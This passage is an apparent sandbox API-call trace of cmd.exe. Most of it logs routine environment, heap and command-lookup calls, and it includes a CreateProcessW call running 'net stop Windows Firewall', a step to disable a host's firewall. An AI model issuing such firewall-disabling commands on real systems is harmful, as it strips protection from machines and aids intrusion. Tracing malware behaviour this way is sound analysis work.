_String2="RANDOM") returned -2 [0292.555] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0292.562] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0292.562] GetProcessHeap () returned 0x540000 [0292.562] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x548718) returned 1 [0292.563] GetEnvironmentStringsW () returned 0x547cf0* [0292.563] GetProcessHeap () returned 0x540000 [0292.563] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xa32) returned 0x54a7c0 [0292.563] FreeEnvironmentStringsA (penv="A") returned 1 [0292.563] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0292.563] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0292.563] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0292.563] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0292.563] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0292.563] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0292.563] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0292.563] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0292.563] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0292.563] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0292.563] GetProcessHeap () returned 0x540000 [0292.564] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x44) returned 0x5405c8 [0292.564] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0292.564] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0292.564] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0292.564] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x540618 [0292.564] FindClose (in: hFindFile=0x540618 | out: hFindFile=0x540618) returned 1 [0292.565] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x540618 [0292.565] FindClose (in: hFindFile=0x540618 | out: hFindFile=0x540618) returned 1 [0292.565] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0292.565] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x540618 [0292.565] FindClose (in: hFindFile=0x540618 | out: hFindFile=0x540618) returned 1 [0292.565] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0292.565] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0292.565] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0292.565] GetProcessHeap () returned 0x540000 [0292.566] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x54a7c0) returned 1 [0292.566] GetEnvironmentStringsW () returned 0x547cf0* [0292.566] GetProcessHeap () returned 0x540000 [0292.566] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xa76) returned 0x549d80 [0292.566] FreeEnvironmentStringsA (penv="=") returned 1 [0292.566] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0292.566] GetProcessHeap () returned 0x540000 [0292.567] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x5405c8) returned 1 [0292.567] GetProcessHeap () returned 0x540000 [0292.567] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x400e) returned 0x54bc80 [0292.567] GetProcessHeap () returned 0x540000 [0292.567] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x40) returned 0x54a800 [0292.568] GetProcessHeap () returned 0x540000 [0292.568] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x54bc80) returned 1 [0292.568] GetConsoleOutputCP () returned 0x1b5 [0292.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0292.570] GetUserDefaultLCID () returned 0x409 [0292.570] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0292.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0292.571] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0292.573] GetProcessHeap () returned 0x540000 [0292.573] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20c) returned 0x54a890 [0292.573] GetConsoleTitleW (in: lpConsoleTitle=0x54a890, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0292.573] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0292.573] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0292.573] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0292.574] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0292.574] GetProcessHeap () returned 0x540000 [0292.574] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x400a) returned 0x54bc80 [0292.574] GetProcessHeap () returned 0x540000 [0292.574] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x54bc80) returned 1 [0292.575] _wcsicmp (_String1="net", _String2=")") returned 69 [0292.575] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0292.575] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0292.575] _wcsicmp (_String1="IF", _String2="net") returned -5 [0292.575] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0292.575] _wcsicmp (_String1="REM", _String2="net") returned 4 [0292.575] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0292.575] GetProcessHeap () returned 0x540000 [0292.575] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x58) returned 0x54aaa8 [0292.575] GetProcessHeap () returned 0x540000 [0292.575] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x10) returned 0x540578 [0292.576] GetProcessHeap () returned 0x540000 [0292.576] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x36) returned 0x54ab08 [0292.577] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0292.577] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0292.577] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0292.577] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0292.577] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0292.578] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0292.578] _wcsicmp (_String1="net", _String2="CD") returned 11 [0292.578] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0292.578] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0292.578] _wcsicmp (_String1="net", _String2="REN") returned -4 [0292.578] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0292.578] _wcsicmp (_String1="net", _String2="SET") returned -5 [0292.578] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0292.578] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0292.578] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0292.578] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0292.578] _wcsicmp (_String1="net", _String2="MD") returned 1 [0292.578] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0292.578] _wcsicmp (_String1="net", _String2="RD") returned -4 [0292.578] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0292.578] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0292.578] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0292.578] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0292.578] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0292.578] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0292.578] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0292.578] _wcsicmp (_String1="net", _String2="VER") returned -8 [0292.578] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0292.578] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0292.578] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0292.578] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0292.578] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0292.578] _wcsicmp (_String1="net", _String2="START") returned -5 [0292.578] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0292.579] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0292.579] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0292.579] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0292.579] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0292.579] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0292.579] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0292.579] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0292.579] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0292.579] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0292.579] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0292.579] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0292.579] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0292.579] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0292.579] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0292.579] _wcsicmp (_String1="net", _String2="CD") returned 11 [0292.579] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0292.579] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0292.579] _wcsicmp (_String1="net", _String2="REN") returned -4 [0292.579] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0292.579] _wcsicmp (_String1="net", _String2="SET") returned -5 [0292.579] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0292.579] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0292.579] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0292.579] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0292.579] _wcsicmp (_String1="net", _String2="MD") returned 1 [0292.580] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0292.580] _wcsicmp (_String1="net", _String2="RD") returned -4 [0292.580] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0292.580] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0292.580] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0292.580] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0292.580] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0292.580] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0292.580] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0292.580] _wcsicmp (_String1="net", _String2="VER") returned -8 [0292.580] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0292.580] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0292.580] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0292.580] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0292.580] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0292.580] _wcsicmp (_String1="net", _String2="START") returned -5 [0292.580] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0292.580] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0292.580] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0292.580] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0292.580] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0292.580] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0292.580] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0292.580] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0292.580] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0292.580] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0292.580] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0292.580] _wcsicmp (_String1="net", _String2="IF") returned 5 [0292.580] _wcsicmp (_String1="net", _String2="REM") returned -4 [0292.581] GetProcessHeap () returned 0x540000 [0292.581] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x210) returned 0x54ab48 [0292.581] GetProcessHeap () returned 0x540000 [0292.581] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3e) returned 0x54ad60 [0292.581] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0292.581] GetProcessHeap () returned 0x540000 [0292.581] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x418) returned 0x54ada8 [0292.581] SetErrorMode (uMode=0x0) returned 0x0 [0292.581] SetErrorMode (uMode=0x1) returned 0x0 [0292.581] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x54adb0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0292.581] SetErrorMode (uMode=0x0) returned 0x1 [0292.582] GetProcessHeap () returned 0x540000 [0292.582] RtlReAllocateHeap (Heap=0x540000, Flags=0x0, Ptr=0x54ada8, Size=0x4c) returned 0x54ada8 [0292.582] GetProcessHeap () returned 0x540000 [0292.582] RtlSizeHeap (HeapHandle=0x540000, Flags=0x0, MemoryPointer=0x54ada8) returned 0x4c [0292.582] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0292.582] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0292.583] GetProcessHeap () returned 0x540000 [0292.583] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x110) returned 0x54ae00 [0292.583] GetProcessHeap () returned 0x540000 [0292.583] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x218) returned 0x54af18 [0292.591] GetProcessHeap () returned 0x540000 [0292.591] RtlReAllocateHeap (Heap=0x540000, Flags=0x0, Ptr=0x54af18, Size=0x112) returned 0x54af18 [0292.591] GetProcessHeap () returned 0x540000 [0292.591] RtlSizeHeap (HeapHandle=0x540000, Flags=0x0, MemoryPointer=0x54af18) returned 0x112 [0292.591] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0292.591] GetProcessHeap () returned 0x540000 [0292.591] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xe0) returned 0x54b038 [0292.594] GetProcessHeap () returned 0x540000 [0292.594] RtlReAllocateHeap (Heap=0x540000, Flags=0x0, Ptr=0x54b038, Size=0x76) returned 0x54b038 [0292.594] GetProcessHeap () returned 0x540000 [0292.594] RtlSizeHeap (HeapHandle=0x540000, Flags=0x0, MemoryPointer=0x54b038) returned 0x76 [0292.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.595] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0292.595] GetLastError () returned 0x2 [0292.596] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x54b0b8 [0292.596] GetProcessHeap () returned 0x540000 [0292.596] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x14) returned 0x547638 [0292.596] FindClose (in: hFindFile=0x54b0b8 | out: hFindFile=0x54b0b8) returned 1 [0292.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0292.597] GetLastError () returned 0x2 [0292.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x54b0b8 [0292.597] GetProcessHeap () returned 0x540000 [0292.597] RtlReAllocateHeap (Heap=0x540000, Flags=0x0, Ptr=0x547638, Size=0x4) returned 0x540590 [0292.597] FindClose (in: hFindFile=0x54b0b8 | out: hFindFile=0x54b0b8) returned 1 [0292.597] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0292.597] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0292.597] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0292.598] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0292.598] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0292.598] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0292.598] GetProcessHeap () returned 0x540000 [0292.599] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x18) returned 0x547738 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.599] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0292.600] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0292.600] GetProcessHeap () returned 0x540000 [0292.600] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x547738) returned 1 [0292.600] GetProcessHeap () returned 0x540000 [0292.600] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xa) returned 0x54b0b8 [0292.600] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0292.603] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop Windows Firewall", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop Windows Firewall", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="net stop Windows Firewall", lpProcessInformation=0x19f6fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe60, dwThreadId=0x1058)) returned 1 [0293.011] CloseHandle (hObject=0xa4) returned 1 [0293.011] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0293.011] GetProcessHeap () returned 0x540000 [0293.011] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x549d80) returned 1 [0293.011] GetEnvironmentStringsW () returned 0x549d80* [0293.011] GetProcessHeap () returned 0x540000 [0293.012] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xa76) returned 0x547cf0 [0293.012] FreeEnvironmentStringsA (penv="=") returned 1 [0293.012] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0296.051] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x1) returned 1 [0296.052] CloseHandle (hObject=0xa8) returned 1 [0296.052] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000001") returned 8 [0296.053] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0296.053] GetProcessHeap () returned 0x540000 [0296.053] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x547cf0) returned 1 [0296.054] GetEnvironmentStringsW () returned 0x547cf0* [0296.054] GetProcessHeap () returned 0x540000 [0296.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xa9c) returned 0x54c728 [0296.054] FreeEnvironmentStringsA (penv="=") returned 1 [0296.054] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0296.054] GetProcessHeap () returned 0x540000 [0296.054] RtlFreeHeap (HeapHandle=0x540000, Flags=0x0, BaseAddress=0x54c728) returned 1 [0296.054] GetEnvironmentStringsW () returned 0x547cf0* [0296.054] GetProcessHeap () returned 0x540000 [0296.054] 